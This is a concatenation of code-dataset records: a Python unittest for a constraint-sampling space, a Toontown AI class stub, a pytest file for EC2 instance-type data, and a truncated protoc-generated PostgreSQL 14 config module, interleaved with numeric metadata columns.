        self.assertEqual(sample_space.sample_sat_degree([0, 0]), 0)
        self.assertEqual(sample_space.sample_sat_degree([4, 5]), 1)
        self.assertEqual(sample_space.sample_sat_degree([5, 4]), -1)
        sample_space.glob_compress = False
        self.assertEqual(sample_space.sample_sat_degree([0, 0]), [0])
        self.assertEqual(sample_space.sample_sat_degree([4, 5]), [1])
        self.assertEqual(sample_space.sample_sat_degree([5, 4]), [-1])
        constraints = ["p > q"]
        constraints = list(map(normalise_constraint, constraints))
        constraints = split_constraints(constraints)
        sample_space.glob_constraints = constraints
        sample_space.glob_compress = True
        self.assertEqual(sample_space.sample_sat_degree([0, 0]), 0)
        self.assertEqual(sample_space.sample_sat_degree([4, 5]), -1)
        self.assertEqual(sample_space.sample_sat_degree([5, 4]), 1)
        sample_space.glob_compress = False
        self.assertEqual(sample_space.sample_sat_degree([0, 0]), [0])
        self.assertEqual(sample_space.sample_sat_degree([4, 5]), [-1])
        self.assertEqual(sample_space.sample_sat_degree([5, 4]), [1])

    def test_space_sample(self):
        """sample(): whole-space sampling accumulates sat/unsat samples in the space."""
        print(colored("Sampling space test here", 'blue'))
        ## Initialisation
        space = RefinedSpace((0, 1), ["x"], ["Real"], [Interval(0, 1)])
        # print(space.nice_print())
        debug = False
        constraints1 = ["x<3"]
        constraints2 = ["x>3"]
        constraints3 = ["x>3", "x<3"]
        constraints4 = ["x<=1", "x>=0"]
        constraints5 = ["x>3", "x>=0"]
        ## def sample(space, constraints, size_q, compress)
        ## Example: sample(space, constraints1, 1, debug=debug)
        # a = sample(space, constraints1, 1, debug=debug)
        # size_q=1 draws a single sample; the sat/unsat counters on the space
        # grow cumulatively across calls.
        self.assertEqual(sample(space, constraints1, 1, debug=debug)[0][0], True)
        self.assertEqual(len(space.get_sat_samples()), 1)
        self.assertEqual(len(space.get_unsat_samples()), 0)
        self.assertEqual(sample(space, constraints2, 1, debug=debug)[0][0], False)
        self.assertEqual(len(space.get_sat_samples()), 1)
        self.assertEqual(len(space.get_unsat_samples()), 1)
        self.assertEqual(sample(space, constraints3, 1, compress=True, debug=debug)[0], False)
        self.assertEqual(len(space.get_sat_samples()), 1)
        self.assertEqual(len(space.get_unsat_samples()), 2)
        self.assertEqual(sample(space, constraints4, 1, compress=True, debug=debug)[0], True)
        self.assertEqual(len(space.get_sat_samples()), 2)
        self.assertEqual(len(space.get_unsat_samples()), 2)
        self.assertEqual(sample(space, constraints5, 1, compress=True, debug=debug)[0], False)
        self.assertEqual(len(space.get_sat_samples()), 2)
        self.assertEqual(len(space.get_unsat_samples()), 3)
        # Fresh 2D space, compressed results.
        space = RefinedSpace([(0, 1), (0, 1)], ["x", "y"])
        constraints3 = ["x+y>3", "x+y<3"]
        constraints4 = ["x+y<=1", "x+y>=0"]
        constraints5 = ["x+y>3", "x+y>=0"]
        self.assertEqual(sample(space, constraints3, 1, compress=True, debug=debug)[0], False)
        self.assertEqual(len(space.get_sat_samples()), 0)
        self.assertEqual(len(space.get_unsat_samples()), 1)
        self.assertEqual(sample(space, constraints4, 1, compress=True, debug=debug)[0], True)
        self.assertEqual(len(space.get_sat_samples()), 1)
        self.assertEqual(len(space.get_unsat_samples()), 1)
        self.assertEqual(sample(space, constraints5, 1, compress=True, debug=debug)[0], False)
        self.assertEqual(len(space.get_sat_samples()), 1)
        self.assertEqual(len(space.get_unsat_samples()), 2)
        # Same constraints without compress: per-constraint truth lists.
        space = RefinedSpace([(0, 1), (0, 1)], ["x", "y"])
        constraints3 = ["x+y>3", "x+y<3"]
        constraints4 = ["x+y<=1", "x+y>=0"]
        constraints5 = ["x+y>3", "x+y>=0"]
        self.assertEqual(sample(space, constraints3, 1, debug=debug)[0], [False, True])
        self.assertEqual(len(space.get_sat_samples()), 0)
        self.assertEqual(len(space.get_unsat_samples()), 1)
        self.assertEqual(sample(space, constraints4, 1, debug=debug)[0], [True, True])
        self.assertEqual(len(space.get_sat_samples()), 1)
        self.assertEqual(len(space.get_unsat_samples()), 1)
        self.assertEqual(sample(space, constraints5, 1, debug=debug)[0], [False, True])
        self.assertEqual(len(space.get_sat_samples()), 1)
        self.assertEqual(len(space.get_unsat_samples()), 2)
# Allow running this test module directly with `python test_sample_space.py`.
if __name__ == "__main__":
    unittest.main()
| 49.82
| 113
| 0.653713
| 1,710
| 12,455
| 4.560234
| 0.052632
| 0.18338
| 0.199282
| 0.24673
| 0.89741
| 0.883432
| 0.869197
| 0.859836
| 0.845858
| 0.84278
| 0
| 0.043246
| 0.188679
| 12,455
| 249
| 114
| 50.02008
| 0.728451
| 0.021999
| 0
| 0.604061
| 0
| 0
| 0.027296
| 0
| 0
| 0
| 0
| 0
| 0.553299
| 1
| 0.015228
| false
| 0
| 0.040609
| 0
| 0.060914
| 0.025381
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
39f004dd2fc6be21cd91daf496db4adeddb84b0f
| 114
|
py
|
Python
|
toontown/building/DistributedToonHallInteriorAI.py
|
CrankySupertoon01/Toontown-2
|
60893d104528a8e7eb4aced5d0015f22e203466d
|
[
"MIT"
] | 1
|
2021-02-13T22:40:50.000Z
|
2021-02-13T22:40:50.000Z
|
toontown/building/DistributedToonHallInteriorAI.py
|
CrankySupertoonArchive/Toontown-2
|
60893d104528a8e7eb4aced5d0015f22e203466d
|
[
"MIT"
] | 1
|
2018-07-28T20:07:04.000Z
|
2018-07-30T18:28:34.000Z
|
toontown/building/DistributedToonHallInteriorAI.py
|
CrankySupertoonArchive/Toontown-2
|
60893d104528a8e7eb4aced5d0015f22e203466d
|
[
"MIT"
] | 2
|
2019-12-02T01:39:10.000Z
|
2021-02-13T22:41:00.000Z
|
from DistributedToonInteriorAI import *
class DistributedToonHallInteriorAI(DistributedToonInteriorAI):
    """AI-side distributed object for the Toon Hall interior.

    Inherits all behaviour unchanged from DistributedToonInteriorAI;
    exists so the Toon Hall can be addressed as its own distributed class.
    """
| 22.8
| 63
| 0.859649
| 7
| 114
| 14
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 114
| 4
| 64
| 28.5
| 0.960784
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
8453c68cd09b39aa9720015d5c2c6b29e7579a7e
| 349
|
py
|
Python
|
tests/internal/instance_type/test_instance_type_d2_auto.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
tests/internal/instance_type/test_instance_type_d2_auto.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
tests/internal/instance_type/test_instance_type_d2_auto.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | 1
|
2021-12-15T11:58:22.000Z
|
2021-12-15T11:58:22.000Z
|
# Testing module instance_type.d2
import pytest
import ec2_compare.internal.instance_type.d2
def test_get_internal_data_instance_type_d2_get_instances_list():
    """The generated d2 module must expose a non-empty instance list."""
    instances = ec2_compare.internal.instance_type.d2.get_instances_list()
    assert len(instances) > 0
def test_get_internal_data_instance_type_d2_get():
    """The generated d2 module's `get` collection must be non-empty."""
    data = ec2_compare.internal.instance_type.d2.get
    assert len(data) > 0
| 34.9
| 76
| 0.848138
| 56
| 349
| 4.839286
| 0.339286
| 0.265683
| 0.309963
| 0.250923
| 0.826568
| 0.826568
| 0.612546
| 0.612546
| 0.612546
| 0
| 0
| 0.034056
| 0.074499
| 349
| 9
| 77
| 38.777778
| 0.804954
| 0.088825
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
8464f108e90695ba67eb9460fdc9a7367f4f49ea
| 134,945
|
py
|
Python
|
yandex/cloud/mdb/postgresql/v1/config/postgresql14_pb2.py
|
ovandriyanov/python-sdk
|
eec7dc65ef23789388fa46d13087d4a03cdc6e57
|
[
"MIT"
] | null | null | null |
yandex/cloud/mdb/postgresql/v1/config/postgresql14_pb2.py
|
ovandriyanov/python-sdk
|
eec7dc65ef23789388fa46d13087d4a03cdc6e57
|
[
"MIT"
] | null | null | null |
yandex/cloud/mdb/postgresql/v1/config/postgresql14_pb2.py
|
ovandriyanov/python-sdk
|
eec7dc65ef23789388fa46d13087d4a03cdc6e57
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: yandex/cloud/mdb/postgresql/v1/config/postgresql14.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import wrappers_pb2 as google_dot_protobuf_dot_wrappers__pb2
from yandex.cloud import validation_pb2 as yandex_dot_cloud_dot_validation__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='yandex/cloud/mdb/postgresql/v1/config/postgresql14.proto',
package='yandex.cloud.mdb.postgresql.v1.config',
syntax='proto3',
serialized_options=b'\n)yandex.cloud.api.mdb.postgresql.v1.configZTgithub.com/yandex-cloud/go-genproto/yandex/cloud/mdb/postgresql/v1/config;postgresql',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n8yandex/cloud/mdb/postgresql/v1/config/postgresql14.proto\x12%yandex.cloud.mdb.postgresql.v1.config\x1a\x1egoogle/protobuf/wrappers.proto\x1a\x1dyandex/cloud/validation.proto\"\x9d`\n\x12PostgresqlConfig14\x12\x34\n\x0fmax_connections\x18\x01 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x33\n\x0eshared_buffers\x18\x02 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x31\n\x0ctemp_buffers\x18\x03 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12>\n\x19max_prepared_transactions\x18\x04 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12-\n\x08work_mem\x18\x05 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x39\n\x14maintenance_work_mem\x18\x06 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x38\n\x13\x61utovacuum_work_mem\x18\x07 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x34\n\x0ftemp_file_limit\x18\x08 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x36\n\x11vacuum_cost_delay\x18\t \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x39\n\x14vacuum_cost_page_hit\x18\n \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12:\n\x15vacuum_cost_page_miss\x18\x0b \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12;\n\x16vacuum_cost_page_dirty\x18\x0c \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x36\n\x11vacuum_cost_limit\x18\r \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x41\n\x0e\x62gwriter_delay\x18\x0e \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x0c\xfa\xc7\x31\x08\x31\x30-10000\x12:\n\x15\x62gwriter_lru_maxpages\x18\x0f \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12=\n\x17\x62gwriter_lru_multiplier\x18\x10 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12\x45\n\x14\x62gwriter_flush_after\x18\x11 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\n\xfa\xc7\x31\x06\x30-2048\x12\x44\n\x13\x62\x61\x63kend_flush_after\x18\x12 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\n\xfa\xc7\x31\x06\x30-2048\x12L\n\x16old_snapshot_threshold\x18\x13 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x0f\xfa\xc7\x31\x0b-1-86400000\x12U\n\twal_level\x18\x14 
\x01(\x0e\x32\x42.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.WalLevel\x12g\n\x12synchronous_commit\x18\x15 \x01(\x0e\x32K.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.SynchronousCommit\x12K\n\x12\x63heckpoint_timeout\x18\x16 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x12\xfa\xc7\x31\x0e\x33\x30\x30\x30\x30-86400000\x12\x42\n\x1c\x63heckpoint_completion_target\x18\x17 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12G\n\x16\x63heckpoint_flush_after\x18\x18 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\n\xfa\xc7\x31\x06\x30-2048\x12\x31\n\x0cmax_wal_size\x18\x19 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x31\n\x0cmin_wal_size\x18\x1a \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12@\n\x1bmax_standby_streaming_delay\x18\x1b \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12>\n\x19\x64\x65\x66\x61ult_statistics_target\x18\x1c \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12k\n\x14\x63onstraint_exclusion\x18\x1d \x01(\x0e\x32M.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.ConstraintExclusion\x12;\n\x15\x63ursor_tuple_fraction\x18\x1e \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12J\n\x13\x66rom_collapse_limit\x18\x1f \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x10\xfa\xc7\x31\x0c\x31-2147483647\x12J\n\x13join_collapse_limit\x18 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x10\xfa\xc7\x31\x0c\x31-2147483647\x12h\n\x13\x66orce_parallel_mode\x18! 
\x01(\x0e\x32K.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.ForceParallelMode\x12_\n\x13\x63lient_min_messages\x18\" \x01(\x0e\x32\x42.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.LogLevel\x12\\\n\x10log_min_messages\x18# \x01(\x0e\x32\x42.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.LogLevel\x12\x63\n\x17log_min_error_statement\x18$ \x01(\x0e\x32\x42.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.LogLevel\x12?\n\x1alog_min_duration_statement\x18% \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x33\n\x0flog_checkpoints\x18& \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x33\n\x0flog_connections\x18\' \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x36\n\x12log_disconnections\x18( \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x30\n\x0clog_duration\x18) \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12h\n\x13log_error_verbosity\x18* \x01(\x0e\x32K.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.LogErrorVerbosity\x12\x32\n\x0elog_lock_waits\x18+ \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12]\n\rlog_statement\x18, \x01(\x0e\x32\x46.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.LogStatement\x12\x33\n\x0elog_temp_files\x18- \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x13\n\x0bsearch_path\x18. 
\x01(\t\x12\x30\n\x0crow_security\x18/ \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12u\n\x1d\x64\x65\x66\x61ult_transaction_isolation\x18\x30 \x01(\x0e\x32N.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.TransactionIsolation\x12\x36\n\x11statement_timeout\x18\x31 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x31\n\x0clock_timeout\x18\x32 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12H\n#idle_in_transaction_session_timeout\x18\x33 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12[\n\x0c\x62ytea_output\x18\x34 \x01(\x0e\x32\x45.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.ByteaOutput\x12V\n\txmlbinary\x18\x35 \x01(\x0e\x32\x43.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.XmlBinary\x12V\n\txmloption\x18\x36 \x01(\x0e\x32\x43.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.XmlOption\x12;\n\x16gin_pending_list_limit\x18\x37 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x35\n\x10\x64\x65\x61\x64lock_timeout\x18\x38 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12>\n\x19max_locks_per_transaction\x18\x39 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x43\n\x1emax_pred_locks_per_transaction\x18: \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12/\n\x0b\x61rray_nulls\x18; \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x61\n\x0f\x62\x61\x63kslash_quote\x18< \x01(\x0e\x32H.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.BackslashQuote\x12\x35\n\x11\x64\x65\x66\x61ult_with_oids\x18= \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x39\n\x15\x65scape_string_warning\x18> \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x38\n\x14lo_compat_privileges\x18? 
\x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x39\n\x15quote_all_identifiers\x18\x41 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12?\n\x1bstandard_conforming_strings\x18\x42 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x38\n\x14synchronize_seqscans\x18\x43 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x39\n\x15transform_null_equals\x18\x44 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x31\n\rexit_on_error\x18\x45 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x33\n\rseq_page_cost\x18\x46 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12\x36\n\x10random_page_cost\x18G \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12\x45\n\x16\x61utovacuum_max_workers\x18H \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x08\xfa\xc7\x31\x04\x31-32\x12M\n\x1c\x61utovacuum_vacuum_cost_delay\x18I \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\n\xfa\xc7\x31\x06-1-100\x12O\n\x1c\x61utovacuum_vacuum_cost_limit\x18J \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x0c\xfa\xc7\x31\x08-1-10000\x12J\n\x12\x61utovacuum_naptime\x18K \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x11\xfa\xc7\x31\r1000-86400000\x12H\n\x0f\x61rchive_timeout\x18L \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x12\xfa\xc7\x31\x0e\x31\x30\x30\x30\x30-86400000\x12N\n\x19track_activity_query_size\x18M \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x0e\xfa\xc7\x31\n100-102400\x12\x35\n\x11\x65nable_bitmapscan\x18P \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x32\n\x0e\x65nable_hashagg\x18Q \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x33\n\x0f\x65nable_hashjoin\x18R \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x34\n\x10\x65nable_indexscan\x18S \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x38\n\x14\x65nable_indexonlyscan\x18T \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x33\n\x0f\x65nable_material\x18U \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x34\n\x10\x65nable_mergejoin\x18V \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x33\n\x0f\x65nable_nestloop\x18W 
\x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x32\n\x0e\x65nable_seqscan\x18X \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12/\n\x0b\x65nable_sort\x18Y \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x32\n\x0e\x65nable_tidscan\x18Z \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x45\n\x14max_worker_processes\x18[ \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\n\xfa\xc7\x31\x06\x30-1024\x12\x45\n\x14max_parallel_workers\x18\\ \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\n\xfa\xc7\x31\x06\x30-1024\x12P\n\x1fmax_parallel_workers_per_gather\x18] \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\n\xfa\xc7\x31\x06\x30-1024\x12Q\n\x1e\x61utovacuum_vacuum_scale_factor\x18^ \x01(\x0b\x32\x1c.google.protobuf.DoubleValueB\x0b\xfa\xc7\x31\x07\x30.0-1.0\x12R\n\x1f\x61utovacuum_analyze_scale_factor\x18_ \x01(\x0b\x32\x1c.google.protobuf.DoubleValueB\x0b\xfa\xc7\x31\x07\x30.0-1.0\x12\x41\n\x1d\x64\x65\x66\x61ult_transaction_read_only\x18` \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x10\n\x08timezone\x18\x61 \x01(\t\x12:\n\x16\x65nable_parallel_append\x18\x62 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x38\n\x14\x65nable_parallel_hash\x18\x63 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12<\n\x18\x65nable_partition_pruning\x18\x64 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x42\n\x1e\x65nable_partitionwise_aggregate\x18\x65 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12=\n\x19\x65nable_partitionwise_join\x18\x66 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\'\n\x03jit\x18g \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12N\n max_parallel_maintenance_workers\x18h \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x07\xfa\xc7\x31\x03>=0\x12\x41\n\x1dparallel_leader_participation\x18i \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12N\n\x1blog_transaction_sample_rate\x18k \x01(\x0b\x32\x1c.google.protobuf.DoubleValueB\x0b\xfa\xc7\x31\x07\x30.0-1.0\x12`\n\x0fplan_cache_mode\x18l 
\x01(\x0e\x32G.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.PlanCacheMode\x12I\n\x18\x65\x66\x66\x65\x63tive_io_concurrency\x18m \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\n\xfa\xc7\x31\x06\x30-1000\x12M\n\x14\x65\x66\x66\x65\x63tive_cache_size\x18n \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x12\xfa\xc7\x31\x0e\x30-549755813888\x12r\n\x18shared_preload_libraries\x18o \x03(\x0e\x32P.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.SharedPreloadLibraries\x12U\n\x1d\x61uto_explain_log_min_duration\x18p \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x11\xfa\xc7\x31\r-1-2147483647\x12<\n\x18\x61uto_explain_log_analyze\x18q \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12<\n\x18\x61uto_explain_log_buffers\x18r \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12;\n\x17\x61uto_explain_log_timing\x18s \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12=\n\x19\x61uto_explain_log_triggers\x18t \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12<\n\x18\x61uto_explain_log_verbose\x18u \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x46\n\"auto_explain_log_nested_statements\x18v \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12K\n\x18\x61uto_explain_sample_rate\x18w \x01(\x0b\x32\x1c.google.protobuf.DoubleValueB\x0b\xfa\xc7\x31\x07\x30.0-1.0\x12<\n\x18pg_hint_plan_enable_hint\x18x \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x42\n\x1epg_hint_plan_enable_hint_table\x18y \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12p\n\x18pg_hint_plan_debug_print\x18z \x01(\x0e\x32N.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.PgHintPlanDebugPrint\x12\x66\n\x1apg_hint_plan_message_level\x18{ \x01(\x0e\x32\x42.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.LogLevel\x12I\n\x13hash_mem_multiplier\x18| \x01(\x0b\x32\x1c.google.protobuf.DoubleValueB\x0e\xfa\xc7\x31\n0.0-1000.0\x12W\n\x19logical_decoding_work_mem\x18~ \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x17\xfa\xc7\x31\x13\x36\x35\x35\x33\x36-1099511627776\x12K\n\x1amaintenance_io_concurrency\x18\x7f 
\x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\n\xfa\xc7\x31\x06\x30-1000\x12U\n\x16max_slot_wal_keep_size\x18\x80\x01 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x17\xfa\xc7\x31\x13-1-2251799812636672\x12L\n\rwal_keep_size\x18\x81\x01 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x17\xfa\xc7\x31\x13-1-2251799812636672\x12<\n\x17\x65nable_incremental_sort\x18\x82\x01 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12[\n\"autovacuum_vacuum_insert_threshold\x18\x83\x01 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x11\xfa\xc7\x31\r-1-2147483647\x12[\n%autovacuum_vacuum_insert_scale_factor\x18\x84\x01 \x01(\x0b\x32\x1c.google.protobuf.DoubleValueB\r\xfa\xc7\x31\t0.0-100.0\x12P\n\x17log_min_duration_sample\x18\x85\x01 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x11\xfa\xc7\x31\r-1-2147483647\x12M\n\x19log_statement_sample_rate\x18\x86\x01 \x01(\x0b\x32\x1c.google.protobuf.DoubleValueB\x0b\xfa\xc7\x31\x07\x30.0-1.0\x12Q\n\x18log_parameter_max_length\x18\x87\x01 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x11\xfa\xc7\x31\r-1-2147483647\x12Z\n!log_parameter_max_length_on_error\x18\x88\x01 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x11\xfa\xc7\x31\r-1-2147483647\x12Y\n client_connection_check_interval\x18\x89\x01 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x11\xfa\xc7\x31\r-1-2147483647\x12\x38\n\x13\x65nable_async_append\x18\x8a\x01 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x37\n\x12\x65nable_gathermerge\x18\x8b\x01 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x33\n\x0e\x65nable_memoize\x18\x8c\x01 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12@\n\x1blog_recovery_conflict_waits\x18\x8d\x01 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12L\n\x13vacuum_failsafe_age\x18\x8e\x01 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x11\xfa\xc7\x31\r-1-2147483647\x12V\n\x1dvacuum_multixact_failsafe_age\x18\x8f\x01 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x11\xfa\xc7\x31\r-1-2147483647\x12\x39\n\x14pg_qualstats_enabled\x18\x90\x01 
